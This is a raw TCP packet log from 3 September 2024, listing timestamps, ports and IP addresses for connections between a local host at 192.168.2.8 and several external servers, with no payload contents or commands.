Sep 3, 2024 17:13:17.107450962 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107460022 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107563019 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107572079 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107578993 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.107579947 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107584953 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107594013 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107639074 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.107709885 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107718945 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107727051 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107736111 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107743979 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107748032 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107758045 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107767105 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107851982 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107861996 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107870102 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107880116 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107888937 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107897997 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107907057 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107914925 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107923985 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.107933044 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.108011007 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.108020067 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.108027935 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.108036995 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.108046055 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.108591080 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.108599901 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.108608007 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.109697104 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.109708071 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.109719038 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.109729052 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.110090017 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.110656023 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.110666037 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.110673904 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.111370087 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.111378908 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.111387968 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.111397028 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.111511946 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.111521959 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.111541986 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.111551046 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117202997 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117288113 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117297888 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117306948 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117316961 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117324114 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117382050 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.117394924 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117403984 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117413044 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117423058 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117432117 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117438078 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.117491961 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117501974 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117510080 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117513895 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117639065 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117649078 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117664099 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117672920 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117681026 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117774010 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117789984 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117799997 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117865086 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117875099 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117883921 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117893934 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117902040 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117912054 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.117919922 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118004084 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118012905 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118118048 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118128061 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118135929 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118144035 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118148088 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118155956 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118244886 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118254900 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118263006 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118277073 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118285894 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118383884 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118393898 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118397951 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118551016 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118560076 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118563890 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118680000 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118689060 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118696928 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.118741035 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.125443935 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.125452995 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.125462055 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.125469923 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.125503063 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.125511885 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.125627041 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.125688076 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.165411949 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.165837049 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.169953108 CEST	49727	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:17.170300961 CEST	49731	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:17.177557945 CEST	80	49731	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:17.177640915 CEST	49731	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:17.177862883 CEST	49731	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:17.179033041 CEST	80	49727	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:17.179091930 CEST	49727	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:17.185934067 CEST	80	49731	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:17.209775925 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.551237106 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:17.551302910 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:17.553062916 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:17.562701941 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:17.757090092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:17.757165909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:17.819062948 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:17.819082022 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:17.819174051 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:17.823200941 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:17.828335047 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:17.905286074 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.976311922 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:17.981800079 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:17.989438057 CEST	80	49731	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:17.989490032 CEST	49731	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:17.990113020 CEST	49731	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:17.999202013 CEST	80	49731	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:18.083559990 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.083614111 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.083626032 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.083744049 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.083767891 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.083781004 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.083791018 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.083791971 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:18.083815098 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:18.083832026 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:18.084326982 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.084337950 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.084364891 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:18.165405989 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:18.216221094 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:18.221457958 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:18.227639914 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.227936029 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:18.234323978 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:18.255578995 CEST	80	49731	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:18.255806923 CEST	49731	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:18.317411900 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:18.322388887 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:18.373085976 CEST	49731	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:18.373645067 CEST	49733	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:18.378209114 CEST	80	49731	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:18.378268957 CEST	49731	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:18.378705025 CEST	80	49733	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:18.378787994 CEST	49733	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:18.378925085 CEST	49733	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:18.384067059 CEST	80	49733	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:18.460772991 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:18.460796118 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:18.460808039 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:18.460856915 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:18.461081028 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:18.461092949 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:18.461138964 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:18.485913038 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.485976934 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:18.503871918 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:18.505661964 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:18.511929989 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:18.560853004 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:18.560889959 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:18.565838099 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.565850019 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.565859079 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.565949917 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.565959930 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.566050053 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.566194057 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.682070017 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:18.687001944 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:18.692756891 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:18.747498989 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:18.789760113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.789773941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.789786100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.789798021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.789809942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.789819956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.789834023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.789882898 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.789885998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.789943933 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.791635990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.791647911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.791657925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.791668892 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.791697979 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.791742086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.796289921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.796364069 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.798510075 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:18.803950071 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:18.890245914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.890264988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.890278101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.890350103 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.890466928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.890505075 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.890541077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.890552044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.890610933 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.891330004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.891340971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.891351938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.891412973 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.891412973 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.892082930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.892095089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.892105103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.892152071 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.892177105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.892834902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.892903090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.892914057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.892934084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.892949104 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.893728018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.893738985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.893748999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.893805027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.893805027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.894404888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.894454956 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.894475937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.894488096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.894530058 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.894545078 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.895184994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.895265102 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.895417929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.895508051 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.897485018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.897547007 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.897890091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.897948980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.900675058 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:18.900847912 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:18.907519102 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:18.950599909 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:18.989445925 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:18.993125916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.993166924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.993177891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.993191004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.993243933 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.993360043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.993371010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.993381023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.993417978 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.993437052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.993455887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.993522882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.993535042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.993576050 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.993576050 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.993626118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.993637085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.993648052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.993659019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.993681908 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.993705988 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.993825912 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.993871927 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.994498968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.994564056 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.994656086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.994667053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.994712114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.994729996 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.994740963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.994752884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.994761944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.994772911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.994781971 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.994807959 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.994841099 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.995044947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.995090961 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.995446920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.995457888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.995467901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.995501995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.995512962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.995517969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.995517969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.995523930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.995537043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.995552063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.995552063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.995585918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.995733976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.996047020 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.996381044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.996392012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.996402025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.996431112 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.996452093 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.996460915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.996473074 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.996486902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.996503115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:18.996506929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:18.996526957 CEST	49730	80	192.168.2.8	52.212.52.84
